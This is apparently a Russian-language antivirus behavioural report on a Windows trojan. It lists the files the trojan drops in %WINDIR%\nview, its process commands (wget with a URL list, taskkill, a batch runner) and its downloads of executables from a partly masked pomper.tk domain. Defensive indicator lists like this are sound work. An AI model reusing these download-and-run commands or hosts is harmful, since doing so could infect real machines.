Техническая информация
- '%WINDIR%\nview\inst.exe'
- '%WINDIR%\nview\nvst.exe'
- '%WINDIR%\nview\wget.exe' -i lsass.dll --continue
- '%WINDIR%\nview\rabr.exe'
- '' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /f /im inst.exe
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 8
- '<SYSTEM32>\taskkill.exe' /f /im rabr.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\nview\runer.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im nvst.exe
- %WINDIR%\nview\nvst.exe
- %WINDIR%\nview\inst.exe
- %WINDIR%\nview\rabr.exe
- %WINDIR%\nview\frame.dll
- %WINDIR%\nview\runer.bat
- %WINDIR%\nview\wget.exe
- %WINDIR%\nview\lsass.dll
- 'ab###.pomper.tk':80
- http://ab###.pomper.tk/rabr.exe
- http://ab###.pomper.tk/inst.exe
- http://ab###.pomper.tk/nvst.exe
- DNS ASK ab###.pomper.tk
- ClassName: '' WindowName: ''
- ClassName: 'EDIT' WindowName: ''